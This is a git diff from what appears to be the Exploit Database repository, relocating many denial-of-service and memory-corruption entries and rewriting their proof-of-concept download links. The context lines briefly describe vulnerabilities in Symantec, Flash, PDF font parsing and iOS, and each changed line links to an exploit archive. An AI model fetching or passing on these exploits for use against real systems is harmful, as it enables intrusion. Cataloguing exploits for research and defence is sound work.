afterwards Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39906.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39906.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39929.c b/exploits/multiple/dos/39929.c similarity index 100% rename from platforms/multiple/dos/39929.c rename to exploits/multiple/dos/39929.c diff --git a/platforms/multiple/dos/40031.txt b/exploits/multiple/dos/40031.txt similarity index 97% rename from platforms/multiple/dos/40031.txt rename to exploits/multiple/dos/40031.txt index c542136d7..21445fe3b 100644 --- a/platforms/multiple/dos/40031.txt +++ b/exploits/multiple/dos/40031.txt @@ -56,4 +56,4 @@ These bugs are obviously exploitable for remote code execution on all Symantec c Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40031.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40031.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40032.txt b/exploits/multiple/dos/40032.txt similarity index 97% rename from platforms/multiple/dos/40032.txt rename to exploits/multiple/dos/40032.txt index 22116b8af..b144eb80b 100644 --- a/platforms/multiple/dos/40032.txt +++ b/exploits/multiple/dos/40032.txt @@ -37,4 +37,4 @@ This issue is remotely exploitable just by receiving an email, visiting a websit Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40032.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40032.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40034.txt b/exploits/multiple/dos/40034.txt similarity index 95% rename from platforms/multiple/dos/40034.txt rename to exploits/multiple/dos/40034.txt index b5c2837cb..7236f50ba 100644 --- a/platforms/multiple/dos/40034.txt +++ b/exploits/multiple/dos/40034.txt @@ -24,4 +24,4 @@ This obviously won't work, because it doesn't verify that the old name will fit. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40034.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40034.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40035.txt b/exploits/multiple/dos/40035.txt similarity index 97% rename from platforms/multiple/dos/40035.txt rename to exploits/multiple/dos/40035.txt index 50e969c31..12f699f34 100644 --- a/platforms/multiple/dos/40035.txt +++ b/exploits/multiple/dos/40035.txt @@ -27,4 +27,4 @@ That's (count + 1) * 4, without any checking that will succeed. The attached tes Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40035.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40035.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40036.txt b/exploits/multiple/dos/40036.txt similarity index 96% rename from platforms/multiple/dos/40036.txt rename to exploits/multiple/dos/40036.txt index 16cd38fca..b2e21c214 100644 --- a/platforms/multiple/dos/40036.txt +++ b/exploits/multiple/dos/40036.txt @@ -52,4 +52,4 @@ start end module name Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40036.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40036.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40037.txt b/exploits/multiple/dos/40037.txt similarity index 97% rename from platforms/multiple/dos/40037.txt rename to exploits/multiple/dos/40037.txt index 7f3cafdbb..8e43dcc79 100644 --- a/platforms/multiple/dos/40037.txt +++ b/exploits/multiple/dos/40037.txt @@ -81,4 +81,4 @@ int PPFindRecSet(tagSS_STREAM *stream, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40037.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40037.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40087.txt b/exploits/multiple/dos/40087.txt similarity index 91% rename from platforms/multiple/dos/40087.txt rename to exploits/multiple/dos/40087.txt index 15312dd1a..1f02fc0b0 100644 --- a/platforms/multiple/dos/40087.txt +++ b/exploits/multiple/dos/40087.txt @@ -6,4 +6,4 @@ To differentiate this from other ATF issues, this is an overflow in decompressin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40087.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40087.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40088.txt b/exploits/multiple/dos/40088.txt similarity index 93% rename from platforms/multiple/dos/40088.txt rename to exploits/multiple/dos/40088.txt index 46eb05a54..20987f9da 100644 --- a/platforms/multiple/dos/40088.txt +++ b/exploits/multiple/dos/40088.txt @@ -8,4 +8,4 @@ Took a closer look at this, it is a UaF of plane->model_hp_buffer in the open-so Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40088.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40088.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40089.txt b/exploits/multiple/dos/40089.txt similarity index 89% rename from platforms/multiple/dos/40089.txt rename to exploits/multiple/dos/40089.txt index 1547dc60e..abffffba2 100644 --- a/platforms/multiple/dos/40089.txt +++ b/exploits/multiple/dos/40089.txt @@ -8,4 +8,4 @@ The issue sometimes takes multiple refreshes to crash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40089.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40089.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40090.txt b/exploits/multiple/dos/40090.txt similarity index 87% rename from platforms/multiple/dos/40090.txt rename to exploits/multiple/dos/40090.txt index 60bf6957f..e3c10b2ca 100644 --- a/platforms/multiple/dos/40090.txt +++ b/exploits/multiple/dos/40090.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=129 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40090.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40090.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40095.txt b/exploits/multiple/dos/40095.txt similarity index 95% rename from platforms/multiple/dos/40095.txt rename to exploits/multiple/dos/40095.txt index 49ebad8c4..f07b76e72 100644 --- a/platforms/multiple/dos/40095.txt +++ b/exploits/multiple/dos/40095.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40095.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40095.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40096.txt b/exploits/multiple/dos/40096.txt similarity index 95% rename from platforms/multiple/dos/40096.txt rename to exploits/multiple/dos/40096.txt index efd374b40..ce4e7e591 100644 --- a/platforms/multiple/dos/40096.txt +++ b/exploits/multiple/dos/40096.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40096.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40096.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40097.txt b/exploits/multiple/dos/40097.txt similarity index 95% rename from platforms/multiple/dos/40097.txt rename to exploits/multiple/dos/40097.txt index 8766b7ec1..f2080eef7 100644 --- a/platforms/multiple/dos/40097.txt +++ b/exploits/multiple/dos/40097.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40097.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40097.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40098.txt b/exploits/multiple/dos/40098.txt similarity index 95% rename from platforms/multiple/dos/40098.txt rename to exploits/multiple/dos/40098.txt index 3d1db4d63..4d8502ec8 100644 --- a/platforms/multiple/dos/40098.txt +++ b/exploits/multiple/dos/40098.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40098.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40098.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40099.txt b/exploits/multiple/dos/40099.txt similarity index 95% rename from platforms/multiple/dos/40099.txt rename to exploits/multiple/dos/40099.txt index 7b0174c0f..f49d83101 100644 --- a/platforms/multiple/dos/40099.txt +++ b/exploits/multiple/dos/40099.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40099.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40099.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40100.txt b/exploits/multiple/dos/40100.txt similarity index 95% rename from platforms/multiple/dos/40100.txt rename to exploits/multiple/dos/40100.txt index f92d6f6af..a36abaf11 100644 --- a/platforms/multiple/dos/40100.txt +++ b/exploits/multiple/dos/40100.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40100.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40100.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40101.txt b/exploits/multiple/dos/40101.txt similarity index 95% rename from platforms/multiple/dos/40101.txt rename to exploits/multiple/dos/40101.txt index 113e3d03d..dc196722e 100644 --- a/platforms/multiple/dos/40101.txt +++ b/exploits/multiple/dos/40101.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40101.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40101.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40102.txt b/exploits/multiple/dos/40102.txt similarity index 96% rename from platforms/multiple/dos/40102.txt rename to exploits/multiple/dos/40102.txt index d9e1b7366..bc29035ed 100644 --- a/platforms/multiple/dos/40102.txt +++ b/exploits/multiple/dos/40102.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains “Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40102.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40102.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40103.txt b/exploits/multiple/dos/40103.txt similarity index 96% rename from platforms/multiple/dos/40103.txt rename to exploits/multiple/dos/40103.txt index 6f4710d8a..bb63b46ea 100644 --- a/platforms/multiple/dos/40103.txt +++ b/exploits/multiple/dos/40103.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40103.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40103.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40104.txt b/exploits/multiple/dos/40104.txt similarity index 96% rename from platforms/multiple/dos/40104.txt rename to exploits/multiple/dos/40104.txt index cb5da6b96..87122464b 100644 --- a/platforms/multiple/dos/40104.txt +++ b/exploits/multiple/dos/40104.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Scen =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40104.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40104.zip ############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40105.txt b/exploits/multiple/dos/40105.txt similarity index 96% rename from platforms/multiple/dos/40105.txt rename to exploits/multiple/dos/40105.txt index 8f31aa959..0dacba3cc 100644 --- a/platforms/multiple/dos/40105.txt +++ b/exploits/multiple/dos/40105.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘TAG =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40105.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40105.zip ############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40183.html b/exploits/multiple/dos/40183.html similarity index 100% rename from platforms/multiple/dos/40183.html rename to exploits/multiple/dos/40183.html diff --git a/platforms/multiple/dos/40184.html b/exploits/multiple/dos/40184.html similarity index 100% rename from platforms/multiple/dos/40184.html rename to exploits/multiple/dos/40184.html diff --git a/platforms/multiple/dos/40194.txt b/exploits/multiple/dos/40194.txt similarity index 95% rename from platforms/multiple/dos/40194.txt rename to exploits/multiple/dos/40194.txt index 13a14d7c1..88a95611b 100644 --- a/platforms/multiple/dos/40194.txt +++ b/exploits/multiple/dos/40194.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40194.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40194.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40195.txt b/exploits/multiple/dos/40195.txt similarity index 94% rename from platforms/multiple/dos/40195.txt rename to exploits/multiple/dos/40195.txt index 20db0ab82..2ab27ccab 100644 --- a/platforms/multiple/dos/40195.txt +++ b/exploits/multiple/dos/40195.txt @@ -21,4 +21,4 @@ Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on ts Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40195.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40195.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40197.txt b/exploits/multiple/dos/40197.txt similarity index 95% rename from platforms/multiple/dos/40197.txt rename to exploits/multiple/dos/40197.txt index b21572d91..e8a86b058 100644 --- a/platforms/multiple/dos/40197.txt +++ b/exploits/multiple/dos/40197.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40197.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40197.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40198.txt b/exploits/multiple/dos/40198.txt similarity index 95% rename from platforms/multiple/dos/40198.txt rename to exploits/multiple/dos/40198.txt index 1d7c95ce3..2af085080 100644 --- a/platforms/multiple/dos/40198.txt +++ b/exploits/multiple/dos/40198.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40198.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40198.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40199.txt b/exploits/multiple/dos/40199.txt similarity index 98% rename from platforms/multiple/dos/40199.txt rename to exploits/multiple/dos/40199.txt index 52fe01545..64536c233 100644 --- a/platforms/multiple/dos/40199.txt +++ b/exploits/multiple/dos/40199.txt @@ -84,4 +84,4 @@ Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40199.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40199.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40238.txt b/exploits/multiple/dos/40238.txt similarity index 96% rename from platforms/multiple/dos/40238.txt rename to exploits/multiple/dos/40238.txt index 3a833cea1..2adafdc21 100644 --- a/platforms/multiple/dos/40238.txt +++ b/exploits/multiple/dos/40238.txt @@ -58,6 +58,6 @@ An attacker can use this flaw to read outside the allocated buffer, which could ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/08/COSIG-2016-32.doc -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40238.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40238.zip ####################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40307.txt b/exploits/multiple/dos/40307.txt similarity index 92% rename from platforms/multiple/dos/40307.txt rename to exploits/multiple/dos/40307.txt index 186506626..82618c848 100644 --- a/platforms/multiple/dos/40307.txt +++ b/exploits/multiple/dos/40307.txt @@ -21,4 +21,4 @@ A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40307.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40308.txt b/exploits/multiple/dos/40308.txt similarity index 93% rename from platforms/multiple/dos/40308.txt rename to exploits/multiple/dos/40308.txt index 8b3fa7569..324e24ad1 100644 --- a/platforms/multiple/dos/40308.txt +++ b/exploits/multiple/dos/40308.txt @@ -23,4 +23,4 @@ A fla and swf are attached. The swf crashes in Chrome for Windows. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40308.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40308.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40309.txt b/exploits/multiple/dos/40309.txt similarity index 94% rename from platforms/multiple/dos/40309.txt rename to exploits/multiple/dos/40309.txt index befe2d375..e1f32c37f 100644 --- a/platforms/multiple/dos/40309.txt +++ b/exploits/multiple/dos/40309.txt @@ -26,4 +26,4 @@ A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40309.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40309.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40310.txt b/exploits/multiple/dos/40310.txt similarity index 92% rename from platforms/multiple/dos/40310.txt rename to exploits/multiple/dos/40310.txt index 82c229de6..7b8aff86a 100644 --- a/platforms/multiple/dos/40310.txt +++ b/exploits/multiple/dos/40310.txt @@ -19,4 +19,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40310.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40310.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40311.txt b/exploits/multiple/dos/40311.txt similarity index 91% rename from platforms/multiple/dos/40311.txt rename to exploits/multiple/dos/40311.txt index 76e6fb4cf..787dfda1a 100644 --- a/platforms/multiple/dos/40311.txt +++ b/exploits/multiple/dos/40311.txt @@ -18,4 +18,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40311.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40311.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40355.txt b/exploits/multiple/dos/40355.txt similarity index 93% rename from platforms/multiple/dos/40355.txt rename to exploits/multiple/dos/40355.txt index 66ec1cb6a..752bfc293 100644 --- a/platforms/multiple/dos/40355.txt +++ b/exploits/multiple/dos/40355.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. The PoC prints the value of unallocated memor Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40355.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40356.txt b/exploits/multiple/dos/40356.txt similarity index 91% rename from platforms/multiple/dos/40356.txt rename to exploits/multiple/dos/40356.txt index 3346fe740..21343543d 100644 --- a/platforms/multiple/dos/40356.txt +++ b/exploits/multiple/dos/40356.txt @@ -17,4 +17,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40356.zip \ No newline at end of file diff --git a/platforms/multiple/dos/4038.pl b/exploits/multiple/dos/4038.pl similarity index 100% rename from platforms/multiple/dos/4038.pl rename to exploits/multiple/dos/4038.pl diff --git a/platforms/multiple/dos/40405.txt b/exploits/multiple/dos/40405.txt similarity index 94% rename from platforms/multiple/dos/40405.txt rename to exploits/multiple/dos/40405.txt index 4682bc03d..9b368b3b9 100644 --- a/platforms/multiple/dos/40405.txt +++ b/exploits/multiple/dos/40405.txt @@ -10,4 +10,4 @@ As in issue 810, these are remote code execution vulnerabilities at the highest Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40405.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40405.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40420.txt b/exploits/multiple/dos/40420.txt similarity index 86% rename from platforms/multiple/dos/40420.txt rename to exploits/multiple/dos/40420.txt index ca57e3c4f..cc9e7d635 100644 --- a/platforms/multiple/dos/40420.txt +++ b/exploits/multiple/dos/40420.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40420.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40420.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40421.txt b/exploits/multiple/dos/40421.txt similarity index 86% rename from platforms/multiple/dos/40421.txt rename to exploits/multiple/dos/40421.txt index 56be8d6e3..dba26c864 100644 --- a/platforms/multiple/dos/40421.txt +++ b/exploits/multiple/dos/40421.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40421.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40421.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40453.py b/exploits/multiple/dos/40453.py similarity index 100% rename from platforms/multiple/dos/40453.py rename to exploits/multiple/dos/40453.py diff --git a/platforms/multiple/dos/40510.txt b/exploits/multiple/dos/40510.txt similarity index 96% rename from platforms/multiple/dos/40510.txt rename to exploits/multiple/dos/40510.txt index 5c0397ca7..3b03dc25e 100644 --- a/platforms/multiple/dos/40510.txt +++ b/exploits/multiple/dos/40510.txt @@ -58,6 +58,6 @@ structure that contain an invalid “ConstantPool” could lead to remote code e =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/10/COSIG-2016-35.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40510.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40510.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40654.txt b/exploits/multiple/dos/40654.txt similarity index 96% rename from platforms/multiple/dos/40654.txt rename to exploits/multiple/dos/40654.txt index 722e40081..667202c93 100644 --- a/platforms/multiple/dos/40654.txt +++ b/exploits/multiple/dos/40654.txt @@ -91,4 +91,4 @@ tested on OS X 10.11.6 (15G31) on MacBookPro10,1 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40654.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40654.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40944.py b/exploits/multiple/dos/40944.py similarity index 100% rename from platforms/multiple/dos/40944.py rename to exploits/multiple/dos/40944.py diff --git a/platforms/multiple/dos/40955.txt b/exploits/multiple/dos/40955.txt similarity index 97% rename from platforms/multiple/dos/40955.txt rename to exploits/multiple/dos/40955.txt index 6b2070d11..2eb7067b4 100644 --- a/platforms/multiple/dos/40955.txt +++ b/exploits/multiple/dos/40955.txt @@ -151,4 +151,4 @@ I fear there are a great number of similar issues so just fixing this once insta Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40955.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40955.zip \ No newline at end of file diff --git a/platforms/multiple/dos/40958.c b/exploits/multiple/dos/40958.c similarity index 100% rename from platforms/multiple/dos/40958.c rename to exploits/multiple/dos/40958.c diff --git a/platforms/multiple/dos/40959.c b/exploits/multiple/dos/40959.c similarity index 100% rename from platforms/multiple/dos/40959.c rename to exploits/multiple/dos/40959.c diff --git a/platforms/multiple/dos/40994.html b/exploits/multiple/dos/40994.html similarity index 100% rename from platforms/multiple/dos/40994.html rename to exploits/multiple/dos/40994.html diff --git a/platforms/multiple/dos/41008.txt b/exploits/multiple/dos/41008.txt similarity index 96% rename from platforms/multiple/dos/41008.txt rename to exploits/multiple/dos/41008.txt index 4d760a26b..7fd0a69c2 100644 --- a/platforms/multiple/dos/41008.txt +++ b/exploits/multiple/dos/41008.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41008.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41008.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/41012.txt b/exploits/multiple/dos/41012.txt similarity index 96% rename from platforms/multiple/dos/41012.txt rename to exploits/multiple/dos/41012.txt index ba4451414..7dbccf870 100644 --- a/platforms/multiple/dos/41012.txt +++ b/exploits/multiple/dos/41012.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41012.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41012.zip #################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/41145.py b/exploits/multiple/dos/41145.py similarity index 100% rename from platforms/multiple/dos/41145.py rename to exploits/multiple/dos/41145.py diff --git a/platforms/multiple/dos/41163.txt b/exploits/multiple/dos/41163.txt similarity index 96% rename from platforms/multiple/dos/41163.txt rename to exploits/multiple/dos/41163.txt index 51195f18a..84b6152ff 100644 --- a/platforms/multiple/dos/41163.txt +++ b/exploits/multiple/dos/41163.txt @@ -93,4 +93,4 @@ Exploit for iOS 10.2 iPod Touch 6G 14C92 gets kernel arbitrary r/w Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41163.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41163.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41164.c b/exploits/multiple/dos/41164.c similarity index 100% rename from platforms/multiple/dos/41164.c rename to exploits/multiple/dos/41164.c diff --git a/platforms/multiple/dos/41165.c b/exploits/multiple/dos/41165.c similarity index 100% rename from platforms/multiple/dos/41165.c rename to exploits/multiple/dos/41165.c diff --git a/platforms/multiple/dos/41192.c b/exploits/multiple/dos/41192.c similarity index 100% rename from platforms/multiple/dos/41192.c rename to exploits/multiple/dos/41192.c diff --git a/platforms/multiple/dos/41214.html b/exploits/multiple/dos/41214.html similarity index 100% rename from platforms/multiple/dos/41214.html rename to exploits/multiple/dos/41214.html diff --git a/platforms/multiple/dos/41215.html b/exploits/multiple/dos/41215.html similarity index 100% rename from platforms/multiple/dos/41215.html rename to exploits/multiple/dos/41215.html diff --git a/platforms/multiple/dos/41216.html b/exploits/multiple/dos/41216.html similarity index 100% rename from platforms/multiple/dos/41216.html rename to exploits/multiple/dos/41216.html diff --git a/platforms/multiple/dos/41420.txt b/exploits/multiple/dos/41420.txt similarity index 88% rename from platforms/multiple/dos/41420.txt rename to exploits/multiple/dos/41420.txt index c9fd1a7f6..24d805966 100644 --- a/platforms/multiple/dos/41420.txt +++ b/exploits/multiple/dos/41420.txt @@ -4,4 +4,4 @@ There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41420.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41420.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41421.txt b/exploits/multiple/dos/41421.txt similarity index 86% 